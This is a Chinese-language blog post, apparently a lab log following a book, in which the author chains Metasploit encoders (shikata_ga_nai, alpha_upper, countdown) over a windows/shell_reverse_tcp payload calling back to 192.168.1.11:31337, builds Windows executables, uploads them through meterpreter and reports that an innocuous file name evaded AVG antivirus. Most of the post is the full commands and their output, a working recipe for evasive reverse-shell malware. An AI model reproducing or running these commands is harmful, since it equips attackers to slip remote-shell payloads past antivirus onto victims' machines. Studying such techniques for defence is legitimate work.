metasploit多重编码
来源:互联网 发布:校园二手 源码 编辑:程序博客网 时间:2024/06/06 04:58
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload3.exe[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)[*] x86/alpha_upper succeeded with size 967 (iteration=1)[*] x86/alpha_upper succeeded with size 2003 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2032 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 2061 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2090 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 2119 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 2148 (iteration=5)[*] x86/countdown succeeded with size 2166 (iteration=1)[*] x86/countdown succeeded with size 2184 (iteration=2)[*] x86/countdown succeeded with size 2202 (iteration=3)[*] x86/countdown succeeded with size 2220 (iteration=4)[*] x86/countdown succeeded with size 2238 (iteration=5)root@bt:~# lsDesktop payload1.exe payload2.exe payload3.exeroot@bt:~# file payload3.exe payload3.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bitroot@bt:~#
生成payload3.exe花了很长时间,大概有半个小时,可能是因为虚拟机,内存只有512MB的缘故。
然后,上传到XP,也还是会报威胁:
meterpreter > upload payload3.exe[*] uploading : payload3.exe -> payload3.exe[*] uploaded : payload3.exe -> payload3.exemeterpreter >
书上写的是成功躲过了杀毒软件,但是,我这里,还是报告威胁了,可能因为杀毒软件比较新吧。
后来,我第二次,生成那个payload.exe,就比较快了,不知道为什么。
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload_time.exe[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)[*] x86/alpha_upper succeeded with size 966 (iteration=1)[*] x86/alpha_upper succeeded with size 2000 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)[*] x86/countdown succeeded with size 2163 (iteration=1)[*] x86/countdown succeeded with size 2181 (iteration=2)[*] x86/countdown succeeded with size 2199 (iteration=3)[*] x86/countdown succeeded with size 2217 (iteration=4)[*] x86/countdown succeeded with size 2235 (iteration=5)real 1m34.085suser 0m50.987ssys 0m40.059sroot@bt:~#
但是,在XP里,还是报威胁。
再后来,我想,是不是因为exe文件名的问题,所以,生成了一个很正常的名字readme.exe,这次,竟然躲过了avg杀毒软件的查杀。
root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o read.exe[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)[*] x86/alpha_upper succeeded with size 966 (iteration=1)[*] x86/alpha_upper succeeded with size 2000 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)[*] x86/countdown succeeded with size 2163 (iteration=1)[*] x86/countdown succeeded with size 2181 (iteration=2)[*] x86/countdown succeeded with size 2199 (iteration=3)[*] x86/countdown succeeded with size 2217 (iteration=4)[*] x86/countdown succeeded with size 2235 (iteration=5)real 1m33.468suser 0m52.195ssys 0m39.830sroot@bt:~#
meterpreter > upload read.exe[*] uploading : read.exe -> read.exe[*] uploaded : read.exe -> read.exemeterpreter >
- metasploit多重编码
- metasploit shellcode编码命令....
- Metasploit
- Metasploit
- Metasploit
- Metasploit使用说明
- HTTP METASPLOIT
- Metasploit Framework
- metasploit-unleashed
- Metasploit Support
- metasploit video
- metasploit vpn
- metasploit更新
- Metasploit简介
- metasploit使用
- metasploit + openvas
- metasploit + dns_bruteforce
- Metasploit - postgres
- !!!Chapter 6 Priority Queues (Heaps)
- 杭电1866
- 求助!Help
- Activity启动模式和任务栈(1)
- TFT_LCD(3.5")
- metasploit多重编码
- Windows CE下的USB设备驱动程序开发实例
- 云计算的概念普及及介绍
- Problem A
- Activity启动模式和任务栈(2)
- asp.net邮件群发
- csapp2e 家庭作业 2.81
- Windows CE下USB设备驱动开发的一些基础知识
- Activity启动模式和任务栈(3)